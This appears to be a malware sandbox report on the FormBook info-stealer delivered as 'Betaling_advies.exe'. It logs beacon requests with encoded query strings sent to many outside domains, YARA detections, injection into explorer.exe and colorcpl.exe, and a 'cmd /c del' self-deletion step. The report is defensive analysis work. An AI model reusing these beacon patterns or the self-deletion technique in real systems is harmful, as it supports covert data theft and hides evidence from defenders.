                                                                            server: nginx
                                                                            set-cookie: sid=91eb2608-9856-11eb-b41e-889788a50d02; path=/; domain=.kathyscrabhouse.com; expires=Tue, 26 Apr 2089 13:52:41 GMT; max-age=2147483647; HttpOnly
                                                                            Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                            Data Ascii: Redirecting


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            10192.168.2.449771156.241.53.25380C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:39:38.152107954 CEST7555OUTGET /hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.dfch18.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:39:38.928313971 CEST7556INHTTP/1.1 200 OK
                                                                            Date: Thu, 08 Apr 2021 10:39:38 GMT
                                                                            Server: Apache
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            Pragma: no-cache
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=okdgg4rnn2qcathuale2g25bs6; path=/
                                                                            Set-Cookie: route=ea54326a8ff192ec78367412cf7922e2; Path=/
                                                                            Set-Cookie: PHPSESSID=rlg6hvc3undtc7hrovqsm3umc2; path=/; HttpOnly
                                                                            Set-Cookie: s_l=zh_CN
                                                                            Set-Cookie: s_u=0
                                                                            Upgrade: h2
                                                                            Connection: Upgrade
                                                                            Content-Length: 35
                                                                            Vary: Accept-Encoding
                                                                            Content-Type: ;charset=utf-8
                                                                            Data Raw: 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 3c 2f 73 63 72 69 70 74 3e
                                                                            Data Ascii: <script>location.href="/";</script>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.44975634.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:38:39.930010080 CEST2597OUTGET /hw6d/?DnbLu=Vm8u5YrjxPUHM0A3kvgMiq/IEeemHw6XN/VHMXEVDOFWtOJ88rOTM1/2OfHHahCysW3o&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.ladybugtubs.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:38:40.043973923 CEST2597INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Thu, 08 Apr 2021 10:38:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "606abe1d-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.44976235.246.6.10980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:38:50.241262913 CEST7515OUTGET /hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.organicfarmteam.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:38:50.309286118 CEST7516INHTTP/1.1 301 Moved Permanently
                                                                            Date: Thu, 08 Apr 2021 10:38:50 GMT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            location: https://www.organicfarmteam.com/hw6d?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu
                                                                            strict-transport-security: max-age=120
                                                                            x-wix-request-id: 1617878330.257915390503116529
                                                                            Age: 0
                                                                            Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                            X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVhP3UVzDz9CrWcUvFvX3Kki,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRalp3KHSY8MxizN/9BcvzLHG5XiyI7YPaI33Wr7aivk5Mh3fKEXQvQlSAkB/lstal9R2PTyj9xcM+AAS+WhgVmYd4=,2UNV7KOq4oGjA5+PKsX47F8xRgV30iIDzySL0NmaUxo=,m7d0zj9X6FBqkyAIyh66vGHrav7nknz5S1dppI+wxDdNG+KuK+VIZfbNzHJu0vJu,k4IrXgMmYJ2VF1cp9wAw7/gM7hgrfsPXI0mpsRK+qdjE6RHG7DBN537R29FDdDmxWIHlCalF7YnfvOr2cMPpyw==
                                                                            Cache-Control: no-cache
                                                                            Server: Pepyaka/1.19.0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.44976352.128.23.15380C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:38:55.586497068 CEST7516OUTGET /hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.neutrasystems.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:38:55.621433973 CEST7517INHTTP/1.1 463
                                                                            Server: nginx
                                                                            Date: Thu, 08 Apr 2021 10:38:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 8915
                                                                            Connection: close
                                                                            ETag: "5e52d18f-22d3"
                                                                            X-DIS-Request-ID: b85d1e4e5bdb3f45e047e474ece0d625
                                                                            Set-Cookie: dis-remote-addr=185.32.222.8
                                                                            Set-Cookie: dis-timestamp=2021-04-08T03:38:55-07:00
                                                                            Set-Cookie: dis-request-id=b85d1e4e5bdb3f45e047e474ece0d625
                                                                            X-Frame-Options: sameorigin


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            5192.168.2.44976434.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:39:00.714993954 CEST7527OUTGET /hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.specstrii.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:39:00.894391060 CEST7527INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Thu, 08 Apr 2021 10:39:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "605e0bcb-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            6192.168.2.44976581.169.145.15080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:39:11.062895060 CEST7528OUTGET /hw6d/?DnbLu=k1LpsGxm5HumkAXpmo5e4u//lFYytVV7DtC0wIWjSrCd2GK6ua7omZNXnIaR8+O4hW3P&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.boulderhalle-hamburg.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:39:11.085100889 CEST7529INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 08 Apr 2021 10:39:11 GMT
                                                                            Server: Apache/2.4.46 (Unix)
                                                                            Content-Length: 196
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            7192.168.2.449768198.54.117.21880C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:39:16.335943937 CEST7549OUTGET /hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.thenewyorker.computer
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            8192.168.2.449769107.178.109.1980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:39:27.346791029 CEST7550OUTGET /hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.osaka-computer.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:39:27.504084110 CEST7552INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            Pragma: no-cache
                                                                            Content-Type: text/html
                                                                            Content-Length: 1238
                                                                            Date: Thu, 08 Apr 2021 10:39:27 GMT
                                                                            Server: LiteSpeed
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteS


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            9192.168.2.44977035.208.69.14980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:39:32.784507990 CEST7553OUTGET /hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.werealestatephotography.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:39:32.920567989 CEST7554INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx
                                                                            Date: Thu, 08 Apr 2021 10:39:32 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 162
                                                                            Connection: close
                                                                            Location: https://www.werealestatephotography.com/hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu
                                                                            Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                            X-HTTPS-Enforce: 1
                                                                            X-Proxy-Cache-Info: DT:1
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: Betaling_advies.exe PID: 6992 Parent PID: 5856

                                                                            General

                                                                            Start time:12:37:33
                                                                            Start date:08/04/2021
                                                                            Path:C:\Users\user\Desktop\Betaling_advies.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\Betaling_advies.exe'
                                                                            Imagebase:0x400000
                                                                            File size:206528 bytes
                                                                            MD5 hash:5011945CDEE260FB8688B06568D007B3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Analysis Process: Betaling_advies.exe PID: 7028 Parent PID: 6992

                                                                            General

                                                                            Start time:12:37:34
                                                                            Start date:08/04/2021
                                                                            Path:C:\Users\user\Desktop\Betaling_advies.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\Betaling_advies.exe'
                                                                            Imagebase:0x400000
                                                                            File size:206528 bytes
                                                                            MD5 hash:5011945CDEE260FB8688B06568D007B3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Analysis Process: explorer.exe PID: 3424 Parent PID: 7028

                                                                            General

                                                                            Start time:12:37:39
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff6fee60000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: colorcpl.exe PID: 6548 Parent PID: 3424

                                                                            General

                                                                            Start time:12:37:53
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                            Imagebase:0x180000
                                                                            File size:86528 bytes
                                                                            MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            Analysis Process: cmd.exe PID: 5804 Parent PID: 6548

                                                                            General

                                                                            Start time:12:37:57
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\Betaling_advies.exe'
                                                                            Imagebase:0x11d0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: conhost.exe PID: 5792 Parent PID: 5804

                                                                            General

                                                                            Start time:12:37:58
                                                                            Start date:08/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff724c50000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >